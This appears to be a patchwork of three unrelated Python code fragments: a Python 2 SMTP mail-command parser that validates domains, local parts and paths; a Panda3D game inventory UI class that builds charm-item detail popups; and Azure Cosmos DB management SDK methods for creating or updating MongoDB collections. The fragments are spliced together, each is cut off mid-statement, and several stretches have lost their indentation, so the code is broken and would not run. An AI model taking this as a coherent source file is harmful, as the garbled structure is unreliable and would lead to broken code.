        elif((ord(string[x]) > 64 and ord(string[x]) < 91) or (ord(string[x]) > 96 and ord(string[x]) < 123)
            or (ord(string[x]) > 47 and ord(string[x]) < 58)):
            if(letter_first):
                # The element's first character must be a letter, not a digit.
                if(ord(string[x]) > 64 and ord(string[x]) < 91) or (ord(string[x]) > 96 and ord(string[x]) < 123):
                    letter_first = False
                    pass
                else:
                    try:
                        connectionSocket.send("501 Syntax error in parameters or arguments")
                    except:
                        print "Failed to send message"
                        return 0
                    return 0
            domain_length = domain_length +1
            if(domain_length >= 2):  # element now long enough to be valid
                least_2 = True
                pass
        # A space inside the domain is explicitly a 501, not end-of-domain.
        elif(string[current_place] == " "):
            try:
                connectionSocket.send("501 Syntax error in parameters or arguments")
            except:
                print "Failed to send message"
                return 0
            return 0
        else:
            # Any other character ends the domain; valid only if the
            # final element met the minimum length.
            if(least_2):
                current_place = x
                return current_place
            else:
                try:
                    connectionSocket.send("501 Syntax error in parameters or arguments")
                except:
                    print "Failed to send message"
                    return 0
                return 0
    # Ran off the end of the string: valid only if the final element was
    # long enough and started with a letter.
    if(least_2 == True and letter_first == False):
        return string_length-1
    else:
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
def parseLocalPart(string, current_place, string_length):
    """Parse the <local-part> of a mailbox (the text before the "@").

    Accepts any run of printable ASCII characters excluding whitespace,
    quotes and the specials <>()[]@;:\,."  Returns the index of the first
    disallowed character (normally the "@"), 0 after sending a 501 reply
    if the local-part is empty, or falls off the end and implicitly
    returns None when the string ends inside the local-part — the caller
    (parseMailbox) treats None as an error.
    """
    local_part_length = 0
    for x in range(current_place, string_length):
        # Allowed: ASCII < 128, excluding space(32), tab(9), quote(34),
        # 28, 29, the specials ; : < (58-60), > (62), @ (64), [ \ (91-92),
        # ( ) . , (40, 41, 46, 44).  NOTE(review): ord != 9 is tested
        # twice; redundant but harmless.
        if (ord(string[x]) < 128 and ord(string[x]) != 32 and ord(string[x]) != 9 and ord(string[x]) != 34 and ord(string[x]) != 28
            and ord(string[x]) != 29 and ord(string[x]) != 9 and (ord(string[x]) > 60 or ord(string[x]) < 58)
            and ord(string[x]) != 62 and ord(string[x]) != 64 and (ord(string[x]) > 93 or ord(string[x]) < 91)
            and ord(string[x]) != 40 and ord(string[x]) != 41 and ord(string[x]) != 46 and ord(string[x]) != 44):
            pass
            local_part_length = local_part_length +1
        elif(local_part_length > 0):
            # First disallowed character after at least one valid one:
            # the local-part ends here.
            current_place = x
            return current_place
        else:
            # Grammar requires at least one character in the local-part.
            try:
                connectionSocket.send("501 Syntax error in parameters or arguments")
            except:
                print "Failed to send message"
                return 0
            return 0
def parseMailbox(string, current_place, string_length):
    """Parse a <mailbox> as <local-part>"@"<domain>.

    Returns the index just past the domain on success, or 0 after a 501
    reply has been sent (either here or by a callee) on any error.
    """
    current_place = parseLocalPart(string, current_place, string_length)
    # parseLocalPart returns None when the string ended inside the
    # local-part (its loop completed without returning).
    if(current_place == None):
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    if(current_place == 0):  # callee already reported the error
        return 0
    # The local-part must be followed by "@".
    if(string[current_place] != "@"):
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    # "@" may not be the last character — a domain must follow.
    if(current_place+1 == string_length):
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    # Whitespace right after "@" is reported here as a mailbox error.
    if(string[current_place+1] == " " or string[current_place+1] == "\t"):
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    # least_2 tracks the minimum-length requirement of domain elements.
    least_2 = False
    current_place = parseDomain(string, current_place+1, string_length, least_2)
    if(current_place == 0):
        return 0
    return current_place
def parsePath(string, current_place, string_length):
    """Parse a <path> of the form "<" <mailbox> ">".

    Returns the index of the closing ">" on success, or 0 after a 501
    reply has been sent (here or by a callee).
    """
    # Opening angle bracket.
    if(string[current_place] == "<"):
        current_place = current_place + 1
        pass
    else:
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    # Whitespace directly after "<" is a path error; any other bad
    # character is caught later as a local-part error.
    if(string[current_place] == " " or string[current_place] == "\t"):
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
    current_place = parseMailbox(string, current_place, string_length)
    if(current_place == 0):  # error already reported by parseMailbox
        return 0
    # Closing angle bracket.
    if(string[current_place] == ">"):
        return current_place
    else:
        try:
            connectionSocket.send("501 Syntax error in parameters or arguments")
        except:
            print "Failed to send message"
            return 0
        return 0
def parseMailFromCmd(string, current_place, string_length):
if(string_length < 4):
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0
token = string[:4]
if (token == "MAIL"): # Checks if first text is "MAIL"
current_place = current_place + 4 #
pass #
else: #
if(bool(match('RCPT(( )|(\t))+TO:', string))): # # Checks for other commands to see if there
try:
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0 # #
elif(bool(match('DATA(( )|(\t))*$', string))): # #
try:
connectionSocket.send("503 Bad sequence of commands")
except:
print "Failed to send message"
return 0
return 0
else:
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0 #
for x | |
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import GuiPanel, PiratesGuiGlobals
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesbase import Freebooter
from otp.otpbase import OTPLocalizer
from pirates.piratesgui.BorderFrame import BorderFrame
from pirates.inventory.InventoryUIGlobals import *
from pirates.inventory import ItemGlobals
from pirates.battle import WeaponGlobals
from pirates.uberdog.UberDogGlobals import *
from pirates.reputation import ReputationGlobals
from pirates.economy import EconomyGlobals
from pirates.inventory import InventoryUIItem
class InventoryUICharmItem(InventoryUIItem.InventoryUIItem):
notify = directNotify.newCategory('InventoryUICharmItem')
    def __init__(self, manager, itemTuple, imageScaleFactor=1.0):
        """Build the inventory cell for a charm item.

        Loads the charm's icon from the inventory icon atlas, prepares
        the card/lens/scene-graph plumbing used by the detail popup, and
        hooks window events so the offscreen buffer is (re)created when
        the main window changes.
        """
        InventoryUIItem.InventoryUIItem.__init__(self, manager, itemTuple, imageScaleFactor=imageScaleFactor)
        charmIcons = loader.loadModel('models/gui/gui_icons_inventory')
        # itemTuple[1] is the item id used for all ItemGlobals lookups.
        itemType = ItemGlobals.getType(itemTuple[1])  # NOTE(review): unused here
        if ItemGlobals.getIcon(itemTuple[1]):
            self['image'] = charmIcons.find('**/%s' % ItemGlobals.getIcon(itemTuple[1]))
        self['image_scale'] = 0.1 * imageScaleFactor
        self.helpFrame = None  # detail popup frame, created in showDetails
        # Card geometry + lens used to render the 3D item into a card.
        self.cm = CardMaker('itemCard')
        self.cm.setFrame(-0.3, 0.3, -0.09, 0.09)
        self.buffer = None  # offscreen render buffer, created lazily
        self.lens = PerspectiveLens()
        self.lens.setNear(0.1)
        # Aspect ratio matches the card frame set above (0.6 x 0.18).
        self.lens.setAspectRatio(0.6 / 0.18)
        self.realItem = None  # loaded 3D model of the item, if any
        self.itemCard = None  # card node displaying the rendered item
        self.portraitSceneGraph = NodePath('PortraitSceneGraph')
        # Background/glow art for the detail card, tinted by rarity later.
        detailGui = loader.loadModel('models/gui/gui_card_detail')
        self.bg = detailGui.find('**/color')
        self.bg.setScale(4)
        self.bg.setPos(0, 17, -6.3)
        self.glow = detailGui.find('**/glow')
        self.glow.setScale(3)
        self.glow.setPos(0, 17, -6.3)
        self.glow.setColor(1, 1, 1, 0.8)
        self.setBin('gui-fixed', 1)
        # Rebuild or tear down the offscreen buffer with the main window.
        self.accept('open_main_window', self.createBuffer)
        self.accept('aspectRatioChanged', self.createBuffer)
        self.accept('close_main_window', self.destroyBuffer)
        return
    def destroy(self):
        """Tear down popup, buffer and scene-graph nodes, then chain up.

        Each resource is guarded so destroy is safe to call even if some
        pieces were never created (or already cleaned up).
        """
        if self.helpFrame:
            self.helpFrame.destroy()
            self.helpFrame = None
        self.destroyBuffer()
        if self.itemCard:
            self.itemCard.removeNode()
            del self.itemCard
            self.itemCard = None
        if self.realItem:
            self.realItem.removeNode()
            del self.realItem
            self.realItem = None
        if self.portraitSceneGraph:
            self.portraitSceneGraph.removeNode()
            del self.portraitSceneGraph
            self.portraitSceneGraph = None
        # Let the base class release whatever it owns.
        InventoryUIItem.InventoryUIItem.destroy(self)
        return
def getName(self):
return PLocalizer.getItemName(self.itemTuple[1])
def getPlunderName(self):
nameText = self.getName()
titleColor = PiratesGuiGlobals.TextFG6
rarity = ItemGlobals.getRarity(self.itemTuple[1])
if rarity == ItemGlobals.CRUDE:
titleColor = PiratesGuiGlobals.TextFG3
elif rarity == ItemGlobals.COMMON:
titleColor = PiratesGuiGlobals.TextFG13
elif rarity == ItemGlobals.RARE:
titleColor = PiratesGuiGlobals.TextFG4
elif rarity == ItemGlobals.FAMED:
titleColor = PiratesGuiGlobals.TextFG5
return (nameText, titleColor)
def showDetails(self, cell, detailsPos, detailsHeight, event=None):
self.notify.debug('Item showDetails')
if self.manager.heldItem or self.manager.locked or cell.isEmpty() or self.isEmpty() or not self.itemTuple:
self.notify.debug(' early exit')
return
inv = localAvatar.getInventory()
if not inv:
return
itemId = self.getId()
self.helpFrame = DirectFrame(parent=self.manager, relief=None, state=DGG.DISABLED, sortOrder=1)
self.helpFrame.setBin('gui-popup', -5)
detailGui = loader.loadModel('models/gui/gui_card_detail')
topGui = loader.loadModel('models/gui/toplevel_gui')
coinImage = topGui.find('**/treasure_w_coin*')
self.SkillIcons = loader.loadModel('models/textureCards/skillIcons')
self.BuffIcons = loader.loadModel('models/textureCards/buff_icons')
border = self.SkillIcons.find('**/base')
halfWidth = 0.3
halfHeight = 0.2
basePosX = cell.getX(aspect2d)
basePosZ = cell.getZ(aspect2d)
cellSizeX = 0.0
cellSizeZ = 0.0
if cell:
cellSizeX = cell.cellSizeX
cellSizeZ = cell.cellSizeZ
textScale = PiratesGuiGlobals.TextScaleMed
titleScale = PiratesGuiGlobals.TextScaleTitleSmall
if len(self.getName()) >= 30:
titleNameScale = PiratesGuiGlobals.TextScaleLarge
else:
titleNameScale = PiratesGuiGlobals.TextScaleExtraLarge
subtitleScale = PiratesGuiGlobals.TextScaleMed
iconScalar = 1.5
borderScaler = 0.25
splitHeight = 0.01
vMargin = 0.03
runningVertPosition = 0.3
runningSize = 0.0
labels = []
titleColor = PiratesGuiGlobals.TextFG6
rarity = ItemGlobals.getRarity(itemId)
rarityText = PLocalizer.getItemRarityName(rarity)
subtypeText = PLocalizer.getItemSubtypeName(ItemGlobals.getSubtype(itemId))
if rarity == ItemGlobals.CRUDE:
titleColor = PiratesGuiGlobals.TextFG24
else:
if rarity == ItemGlobals.COMMON:
titleColor = PiratesGuiGlobals.TextFG13
else:
if rarity == ItemGlobals.RARE:
titleColor = PiratesGuiGlobals.TextFG4
elif rarity == ItemGlobals.FAMED:
titleColor = PiratesGuiGlobals.TextFG5
titleLabel = DirectLabel(parent=self, relief=None, text=self.getName(), text_scale=titleNameScale, text_fg=titleColor, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
self.bg.setColor(titleColor)
tHeight = 0.07
titleLabel.setZ(runningVertPosition)
runningVertPosition -= tHeight
runningSize += tHeight
labels.append(titleLabel)
subtitleLabel = DirectLabel(parent=self, relief=None, text='\x01slant\x01%s %s\x02' % (rarityText, subtypeText), text_scale=subtitleScale, text_fg=PiratesGuiGlobals.TextFG2, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
subtHeight = 0.05
subtitleLabel.setZ(subtHeight * 0.5 + runningVertPosition)
runningVertPosition -= subtHeight
runningSize += subtHeight
labels.append(subtitleLabel)
itemType = ItemGlobals.getType(itemId)
itemSubtype = ItemGlobals.getSubtype(itemId)
model = ItemGlobals.getModel(itemId)
if model:
self.realItem = loader.loadModel('models/inventory/' + model)
if self.realItem:
posHpr = ItemGlobals.getModelPosHpr(model)
if posHpr:
self.realItem.setPos(posHpr[0], posHpr[1], posHpr[2])
self.realItem.setHpr(posHpr[3], posHpr[4], posHpr[5])
elif itemSubtype == ItemGlobals.RAM:
self.realItem.setPos(-1.5, 1.5, -0.6)
self.realItem.setHpr(70, 160, -90)
else:
self.realItem.setPos(0.0, 1.5, -0.06)
self.realItem.setHpr(0, 90, 0)
self.realItem.reparentTo(self.portraitSceneGraph)
iHeight = 0.18
self.createBuffer()
self.itemCard.setZ(runningVertPosition - 0.06)
runningVertPosition -= iHeight
runningSize += iHeight
labels.append(self.itemCard)
itemCost = int(ItemGlobals.getGoldCost(itemId))
if self.cell and self.cell.container:
itemCost = int(itemCost * self.cell.container.getItemPriceMult())
goldLabel = DirectLabel(parent=self, relief=None, image=coinImage, image_scale=0.12, image_pos=Vec3(0.025, 0, -0.02), text=str(itemCost), text_scale=subtitleScale, text_align=TextNode.ARight, text_fg=PiratesGuiGlobals.TextFG1, text_shadow=PiratesGuiGlobals.TextShadow, pos=(halfWidth - 0.05, 0.0, runningVertPosition + 0.08), text_pos=(0.0, -textScale))
labels.append(goldLabel)
specialAttack = ItemGlobals.getSpecialAttack(itemId)
if specialAttack:
attackIcon = self.SkillIcons.find('**/%s' % WeaponGlobals.getSkillIcon(specialAttack))
specialAttackNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.1, geom=attackIcon, geom_scale=0.1, image_pos=(-0.07, 0.0, -0.05), geom_pos=(-0.07, 0.0, -0.05), text=PLocalizer.getInventoryTypeName(specialAttack), text_scale=PiratesGuiGlobals.TextScaleLarge, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, text_fg=titleColor, text_font=PiratesGlobals.getInterfaceOutlineFont(), pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
specialAttackRankLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.ItemRank % ItemGlobals.getSpecialAttackRank(itemId), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
specialAttackType = WeaponGlobals.getSkillTrack(specialAttack)
if specialAttackType == WeaponGlobals.BREAK_ATTACK_SKILL_INDEX:
specialAttackTypeText = PLocalizer.BreakAttackSkill
elif specialAttackType == WeaponGlobals.DEFENSE_SKILL_INDEX:
specialAttackTypeText = PLocalizer.DefenseSkill
else:
specialAttackTypeText = PLocalizer.WeaponSkill
specialAttackTypeLabel = DirectLabel(parent=self, relief=None, text=specialAttackTypeText, text_scale=PiratesGuiGlobals.TextScaleLarge, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - PiratesGuiGlobals.TextScaleLarge), text_pos=(0.0, -textScale))
specialAttackInfo = PLocalizer.SkillDescriptions.get(specialAttack)
specialAttackDescriptionText = specialAttackInfo[1]
specialAttackDescriptionLabel = DirectLabel(parent=self, relief=None, text=specialAttackDescriptionText, text_scale=textScale, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - (specialAttackNameLabel.getHeight() + specialAttackTypeLabel.getHeight() - 0.06)), text_pos=(0.0, -textScale))
saHeight = specialAttackNameLabel.getHeight() + specialAttackTypeLabel.getHeight() + specialAttackDescriptionLabel.getHeight() - 0.04
runningVertPosition -= saHeight
runningSize += saHeight
labels.append(specialAttackNameLabel)
labels.append(specialAttackRankLabel)
labels.append(specialAttackTypeLabel)
labels.append(specialAttackDescriptionLabel)
attributes = ItemGlobals.getAttributes(itemId)
for i in range(0, len(attributes)):
attributeIcon = self.SkillIcons.find('**/%s' % ItemGlobals.getAttributeIcon(attributes[i][0]))
if not attributeIcon:
attributeIcon = self.BuffIcons.find('**/%s' % ItemGlobals.getAttributeIcon(attributes[i][0]))
attributeNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.05, geom=attributeIcon, geom_scale=0.05, image_pos=(-0.07, 0.0, -0.03), geom_pos=(-0.07, 0.0, -0.03), text=PLocalizer.getItemAttributeName(attributes[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, text_fg=titleColor, text_font=PiratesGlobals.getInterfaceOutlineFont(), pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
attributeRankLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.ItemRank % attributes[i][1], text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
if attributeNameLabel.getHeight() > 0.075:
attributeNameSpace = 0.08
else:
attributeNameSpace = PiratesGuiGlobals.TextScaleLarge
attributeDescriptionLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.getItemAttributeDescription(attributes[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - attributeNameSpace), text_pos=(0.0, -textScale))
aHeight = attributeNameLabel.getHeight() + attributeDescriptionLabel.getHeight()
runningVertPosition -= aHeight + splitHeight
runningSize += aHeight + splitHeight
labels.append(attributeNameLabel)
labels.append(attributeRankLabel)
labels.append(attributeDescriptionLabel)
skillBoosts = ItemGlobals.getSkillBoosts(itemId)
for i in range(0, len(skillBoosts)):
boostIcon = self.SkillIcons.find('**/%s' % WeaponGlobals.getSkillIcon(skillBoosts[i][0]))
boostNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.05, geom=boostIcon, geom_scale=0.05, image_pos=(-0.07, 0.0, -0.03), geom_pos=(-0.07, 0.0, -0.03), text=PLocalizer.ItemBoost % PLocalizer.getInventoryTypeName(skillBoosts[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
boostRankLabel = DirectLabel(parent=self, relief=None, text='+%s' % str(skillBoosts[i][1]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
bHeight = boostNameLabel.getHeight()
runningVertPosition -= bHeight + splitHeight
runningSize += bHeight + splitHeight
labels.append(boostNameLabel)
labels.append(boostRankLabel)
description = PLocalizer.getItemFlavorText(itemId)
if description != '':
descriptionLabel = DirectLabel(parent=self, relief=None, text=description, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.95 / textScale), text_align=TextNode.ALeft, pos=(-halfWidth + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
dHeight = descriptionLabel.getHeight() + 0.02
runningVertPosition -= dHeight
runningSize += dHeight
labels.append(descriptionLabel)
weaponLevel = 0
weaponRepId = WeaponGlobals.getRepId(itemId)
weaponRep = inv.getReputation(weaponRepId)
weaponReq = ItemGlobals.getWeaponRequirement(itemId)
weaponText = None
if weaponReq:
weaponLevel = ReputationGlobals.getLevelFromTotalReputation(weaponRepId, weaponRep)[0]
if weaponLevel < weaponReq:
weaponColor = PiratesGuiGlobals.TextFG6
else:
weaponColor = (0.4, 0.4, 0.4, 1.0)
weaponText = PLocalizer.ItemLevelRequirement % (weaponReq, PLocalizer.getItemTypeName(itemType))
else:
trainingToken = EconomyGlobals.getItemTrainingReq(itemId)
trainingAmt = inv.getItemQuantity(trainingToken)
if trainingAmt == 0:
weaponColor = PiratesGuiGlobals.TextFG6
weaponText = PLocalizer.ItemTrainingRequirement % PLocalizer.getItemTypeName(itemType)
if weaponText:
weaponReqLabel = DirectLabel(parent=self, relief=None, text=weaponText, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (1.5 / titleScale), text_fg=weaponColor, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
wHeight = weaponReqLabel.getHeight()
runningVertPosition -= wHeight
runningSize += wHeight
labels.append(weaponReqLabel)
if not Freebooter.getPaidStatus(localAvatar.getDoId()):
if rarity != ItemGlobals.CRUDE:
unlimitedLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.UnlimitedAccessRequirement, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (1.5 / titleScale), text_fg=PiratesGuiGlobals.TextFG6, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
uHeight = unlimitedLabel.getHeight()
runningVertPosition -= uHeight
runningSize += uHeight
labels.append(unlimitedLabel)
runningVertPosition -= 0.02
runningSize += 0.02
panels = self.helpFrame.attachNewNode('panels')
topPanel = panels.attachNewNode('middlePanel')
detailGui.find('**/top_panel').copyTo(topPanel)
topPanel.setScale(0.08)
topPanel.reparentTo(self.helpFrame)
middlePanel = panels.attachNewNode('middlePanel')
detailGui.find('**/middle_panel').copyTo(middlePanel)
middlePanel.setScale(0.08)
middlePanel.reparentTo(self.helpFrame)
placement = 0
i = 0
heightMax = -0.08
currentHeight = runningVertPosition
while currentHeight < heightMax:
middlePanel = panels.attachNewNode('middlePanel%s' % 1)
detailGui.find('**/middle_panel').copyTo(middlePanel)
middlePanel.setScale(0.08)
middlePanel.reparentTo(self.helpFrame)
if currentHeight + 0.2 >= heightMax:
difference = heightMax - currentHeight
placement += 0.168 / 0.2 * difference
currentHeight += difference
else:
placement += 0.168
currentHeight += 0.2
middlePanel.setZ(-placement)
i += 1
bottomPanel = panels.attachNewNode('bottomPanel')
detailGui.find('**/bottom_panel').copyTo(bottomPanel)
bottomPanel.setScale(0.08)
bottomPanel.setZ(-placement)
bottomPanel.reparentTo(self.helpFrame)
colorPanel = panels.attachNewNode('colorPanel')
detailGui.find('**/color').copyTo(colorPanel)
colorPanel.setScale(0.08)
colorPanel.setColor(titleColor)
colorPanel.reparentTo(self.helpFrame)
lineBreakTopPanel = panels.attachNewNode('lineBreakTopPanel')
detailGui.find('**/line_break_top').copyTo(lineBreakTopPanel)
lineBreakTopPanel.setScale(0.08, 0.08, 0.07)
lineBreakTopPanel.setZ(0.008)
lineBreakTopPanel.reparentTo(self.helpFrame)
panels.flattenStrong()
self.helpFrame['frameSize'] = (
-halfWidth, halfWidth, -(runningSize + vMargin), vMargin)
totalHeight = self.helpFrame.getHeight() - 0.1
for label in labels:
label.reparentTo(self.helpFrame)
if basePosX > 0.0:
newPosX = basePosX - (halfWidth + cellSizeX * 0.45)
else:
newPosX = basePosX + (halfWidth + cellSizeX * 0.45)
if basePosZ > 0.0:
newPosZ = basePosZ + cellSizeZ * 0.45
newPosZ = basePosZ + totalHeight - | |
= pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def _create_update_mongo_db_collection_initial(
    self,
    resource_group_name, # type: str
    account_name, # type: str
    database_name, # type: str
    collection_name, # type: str
    create_update_mongo_db_collection_parameters, # type: "_models.MongoDBCollectionCreateUpdateParameters"
    **kwargs # type: Any
):
    # type: (...) -> Optional["_models.MongoDBCollectionGetResults"]
    """Send the initial PUT request that starts the create/update long-running operation.

    Returns the deserialized collection when the service replies 200
    (completed synchronously) and ``None`` on 202 (operation accepted,
    still running; the poller fetches the final resource later).
    """
    cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.MongoDBCollectionGetResults"]]
    # Map auth / not-found / conflict statuses to typed exceptions; callers
    # may extend or override the mapping via the 'error_map' kwarg.
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2021-03-15"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"
    # Construct URL: fill the template stored on this method's metadata with
    # serialized (and length/pattern validated) path parameters.
    url = self._create_update_mongo_db_collection_initial.metadata['url'] # type: ignore
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
        'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
        'databaseName': self._serialize.url("database_name", database_name, 'str'),
        'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)
    # Construct parameters
    query_parameters = {} # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
    # Construct headers
    header_parameters = {} # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
    # Serialize the request body from the parameters model.
    body_content_kwargs = {} # type: Dict[str, Any]
    body_content = self._serialize.body(create_update_mongo_db_collection_parameters, 'MongoDBCollectionCreateUpdateParameters')
    body_content_kwargs['content'] = body_content
    request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response
    if response.status_code not in [200, 202]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)
    # 200 carries the result body; 202 means in progress, so leave None.
    deserialized = None
    if response.status_code == 200:
        deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
_create_update_mongo_db_collection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def begin_create_update_mongo_db_collection(
    self,
    resource_group_name, # type: str
    account_name, # type: str
    database_name, # type: str
    collection_name, # type: str
    create_update_mongo_db_collection_parameters, # type: "_models.MongoDBCollectionCreateUpdateParameters"
    **kwargs # type: Any
):
    # type: (...) -> LROPoller["_models.MongoDBCollectionGetResults"]
    """Create or update an Azure Cosmos DB MongoDB Collection.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param account_name: Cosmos DB database account name.
    :type account_name: str
    :param database_name: Cosmos DB database name.
    :type database_name: str
    :param collection_name: Cosmos DB collection name.
    :type collection_name: str
    :param create_update_mongo_db_collection_parameters: The parameters to provide for the current
     MongoDB Collection.
    :type create_update_mongo_db_collection_parameters: ~azure.mgmt.cosmosdb.models.MongoDBCollectionCreateUpdateParameters
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :paramtype polling: bool or ~azure.core.polling.PollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of LROPoller that returns either MongoDBCollectionGetResults or the result of cls(response)
    :rtype: ~azure.core.polling.LROPoller[~azure.mgmt.cosmosdb.models.MongoDBCollectionGetResults]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
    cls = kwargs.pop('cls', None) # type: ClsType["_models.MongoDBCollectionGetResults"]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
    # No continuation token means a fresh operation: issue the initial PUT.
    # 'cls' is overridden so the raw pipeline response is handed back for
    # the poller to inspect (headers, status).
    if cont_token is None:
        raw_result = self._create_update_mongo_db_collection_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            collection_name=collection_name,
            create_update_mongo_db_collection_parameters=create_update_mongo_db_collection_parameters,
            cls=lambda x,y,z: x,
            **kwargs
        )
    # These kwargs were consumed by the initial call and must not leak into
    # the polling method below.
    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)
    def get_long_running_output(pipeline_response):
        # Deserialize the final response of the LRO into the result model.
        deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    path_format_arguments = {
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
